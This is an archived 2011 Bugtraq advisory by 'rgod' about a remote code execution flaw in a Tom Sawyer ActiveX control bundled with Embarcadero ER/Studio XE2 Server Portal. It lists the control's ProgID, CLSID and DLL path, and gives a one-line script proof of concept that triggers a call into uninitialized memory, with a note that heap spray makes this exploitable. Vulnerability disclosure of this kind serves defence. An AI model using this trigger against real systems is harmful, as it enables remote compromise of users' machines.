lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 7 Sep 2011 01:43:41 GMT From: nospam@...il.it To: bugtraq@...urityfocus.com Subject: Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's Default GET Extension Factory ActiveX Control Remote Code Execution See: CVE-2011-2217 reference url: http://www.securityfocus.com/bid/48099 The mentioned product is vulnerable to the same issue. download url: https://downloads.embarcadero.com/free/er_studio_portal ActiveX settings: ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1 CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118} Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll Safe for scripting (registry): true Safe for initialize (registry): true poc: <script> var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1"); </script> then the dll will try to call inside an unitialized memory region which is reachable by an attacker through heap spray. //rgod